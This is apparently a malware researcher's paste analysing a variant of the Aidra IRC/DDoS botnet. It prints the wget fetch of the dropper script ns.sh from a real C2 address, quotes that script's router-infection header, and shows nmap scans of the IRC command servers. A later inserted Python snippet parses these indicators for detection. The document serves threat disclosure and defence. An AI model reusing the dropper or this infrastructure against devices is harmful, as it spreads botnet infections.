Clone Paste - d3m0n3 Linux/IRCTelnet

MalwareMustDie Oct 29th, 2016 (edited)
New version of the Aidra botnet coded by "d3m0n3".
You can find him on IRCnet on #hack.it

This version has geolocation, is coded in Italian, does IPv6 DDoS, and uses wget and ftp to inject the code.

d3m0n3's dDoSnet:
- webserver: http://213.251.186.169 (OVH)
It works!
This is the default web page for this server.
The web server software is running but no content has been added, yet.

BUT BUT... the old getbinaries.sh is now named: ns.sh
wget http://213.251.186.169/ns.sh | more ns.sh
#!/bin/sh
# THIS SCRIPT DOWNLOAD THE BINARIES INTO ROUTER.
# UPLOAD GETBINARIES.SH IN YOUR HTTPD.

# YOUR HTTPD SERVER:
REFERENCE_HTTP="http://213.251.186.169"

# NAME OF BINARIES:
REFERENCE_MIPSEL="mmpl"
REFERENCE_MIPS="mmps"
REFERENCE_SUPERH="msph"
REFERENCE_ARM="marm"
REFERENCE_PPC="mppc"
...

BUT the ircd is not on the same server on OVH !!
Download a binary, emulate it with qemu,
run netstat and... look at this:
DESTINATION: 149.210.145.43 PORT: 7589 STATE: ESTABLISHED
root@localhost:~$ nmap -sT -p7589 -sV 149.210.145.43

Starting Nmap 5.21 ( http://nmap.org ) at 2013-09-16 13:16 CEST
Nmap scan report for 149-210-145-43.colo.transip.net (149.210.145.43)
Host is up (0.13s latency).
PORT     STATE SERVICE VERSION
7589/tcp open  irc     Unreal ircd
Service Info: Host: irc.evils.in

Service detection performed. Please report any incorrect results at
http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.66 seconds
root@localhost:~$

OOOOhh.. irc.evils.in matches the realname of d3m0n3 on IRCnet:
* [d3m0n3] (denial@2a01:270:2002:0:0:bc89:7ec1:ebc3): EvIL
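The two artefacts above (the getbinaries-style ns.sh and the netstat view of the emulated bot) are what an analyst turns into indicators. This is an added example, not part of the paste: it parses the REFERENCE_* assignments of a script in the ns.sh format into per-architecture dropper URLs for blocking, and flags connections to the C2 port seen above in Linux `netstat -tn` style output. The sample script text and netstat lines are constructed here from the values on the page.

```python
import re

# Constructed sample in the ns.sh format shown above (values taken from the paste).
SAMPLE_NS_SH = """#!/bin/sh
# YOUR HTTPD SERVER:
REFERENCE_HTTP="http://213.251.186.169"
# NAME OF BINARIES:
REFERENCE_MIPSEL="mmpl"
REFERENCE_MIPS="mmps"
REFERENCE_ARM="marm"
"""

# Constructed netstat -tn style lines, as an emulated bot under qemu would show.
SAMPLE_NETSTAT = """tcp 0 0 10.0.2.15:41022 149.210.145.43:7589 ESTABLISHED
tcp 0 0 10.0.2.15:53010 93.184.216.34:443 ESTABLISHED
tcp 0 0 10.0.2.15:33102 173.230.149.172:7589 SYN_SENT
"""

# Matches lines like REFERENCE_MIPS="mmps"; the suffix is the architecture label.
ASSIGN_RE = re.compile(r'^\s*REFERENCE_([A-Z0-9]+)="([^"]*)"\s*$', re.M)

def dropper_urls(script: str) -> dict:
    """Map architecture label -> full download URL from a getbinaries-style script."""
    refs = dict(ASSIGN_RE.findall(script))
    base = refs.pop("HTTP", "").rstrip("/")   # REFERENCE_HTTP is the host, not a binary
    return {arch: f"{base}/{name}" for arch, name in refs.items() if base and name}

C2_PORT = 7589  # port the emulated bot connected to (netstat/nmap above)

def c2_connections(netstat_text: str, port: int = C2_PORT) -> list:
    """Return (remote_ip, state) for every TCP line whose remote endpoint uses `port`."""
    hits = []
    for line in netstat_text.splitlines():
        parts = line.split()
        if len(parts) < 6 or parts[0] not in ("tcp", "tcp6"):
            continue
        remote, state = parts[4], parts[5]
        ip, _, rport = remote.rpartition(":")  # rpartition also copes with IPv6 text
        if rport.isdigit() and int(rport) == port:
            hits.append((ip, state))
    return hits
```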
  49.  
#####################################################

NEWS:

- Mailed the abuse desk of TransIP BV (149.210.145.43); the VPS
is suspended at the moment!

- Another d3m0n3 ircd found with 20.000 Aidra bots!
root@localhost:~# nmap -sS -sV -PN 173.230.149.172

Starting Nmap 5.00 ( http://nmap.org ) at 2013-09-17 02:30 CEST

root@ksmini:~# nmap -sS -sV -PN -p7589 173.230.149.172

Starting Nmap 5.00 ( http://nmap.org ) at 2013-09-17 02:30 CEST
Interesting ports on li159-172.members.linode.com (173.230.149.172):
PORT     STATE SERVICE VERSION
7589/tcp open  irc     Unreal ircd
Service Info: Host: irc2.evils.in

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.88 seconds
root@localhost:~#